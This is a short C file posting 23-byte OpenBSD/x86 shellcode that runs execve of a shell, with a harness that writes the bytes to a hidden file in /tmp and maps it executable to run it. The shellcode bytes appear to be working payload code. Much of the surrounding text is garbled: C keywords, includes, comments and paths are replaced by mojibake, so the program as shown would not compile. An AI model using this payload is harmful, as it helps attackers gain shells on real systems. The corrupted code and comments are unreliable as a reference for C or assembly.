/*
 * [OpenBSD/x86]
 * Shellcode for: execve("/Ãù¢½ê/sh", ["/Ãù¢½ê/sh"], NULL)
 * 23 bytes
 * hophet [at] gmail.com
 * http://www.nlabs.com.br/~hophet/
 *
 * Fancy mappings by iruata souza (muzgo)
 * iru.muzgo!gmail.com
 * http://openvms-·ã¤·¤¯Íɤ¹¤ës.com/~muzgo/
 */

#´Þ¤à <sys/types.h>
#´Þ¤à <sys/stat.h>
#´Þ¤à <sys/mman.h>

#´Þ¤à <err.h>
#´Þ¤à <fcntl.h>
#´Þ¤à <stdio.h>
#´Þ¤à <string.h>
#´Þ¤à <unistd.h>
 
char shellcode[] =

"\x99"					/* cltd */
"\x52"					/* ²¡¤·¿Ê¤á¤ë	%edx */
"\x68\x6e\x2f\x73\x68"			/* ²¡¤·¿Ê¤á¤ë	$0x68732f6e */
"\x68\x2f\x2f\x62\x69"			/* ²¡¤·¿Ê¤á¤ë	$0x69622f2f */
"\x89\xe3"				/* mov	%esp,%ebx */
"\x52"					/* ²¡¤·¿Ê¤á¤ë	%edx */
"\x54"					/* ²¡¤·¿Ê¤á¤ë	%esp */
"\x53"                          	/* ²¡¤·¿Ê¤á¤ë	%ebx */
"\x53"					/* ²¡¤·¿Ê¤á¤ë	%ebx */
"\x6a\x3b"				/* ²¡¤·¿Ê¤á¤ë	$0x3b */
"\x58"					/* pop	%eax */
"\xcd\x80";				/* int	$0x80 */

/*
 * Since shellcode above will be mapped in .rodata (read-only Êݸî),
 * we need to Îá¾õ it to a ¤È¤¸¹þ¤ß¡¿Äó½Ð¤¹¤ë and ÃÏ¿Þ¡¿·×²è¤¹¤ë the ¤È¤¸¹þ¤ß¡¿Äó½Ð¤¹¤ë with PROT_EXEC in order
 * to ¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ë it.
 */

int main(̵¸ú¤Î)
{
        ̵¸ú¤Î (*p)();
	int fd;
	
	fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR);
	if(fd < 0)
		err(1, "open");
	
	Îá¾õ(fd, shellcode, strlen(shellcode));
	if((lseek(fd, 0L, SEEK_SET)) < 0)
		err(1, "lseek");

	p = (̵¸ú¤Î (*)())mmap(NULL, strlen(shellcode), PROT_READ|PROT_EXEC, NULL, fd, NULL);
	if (p == (̵¸ú¤Î (*)())MAP_FAILED)
		err(1, "mmap");
	p();
	return 0;
}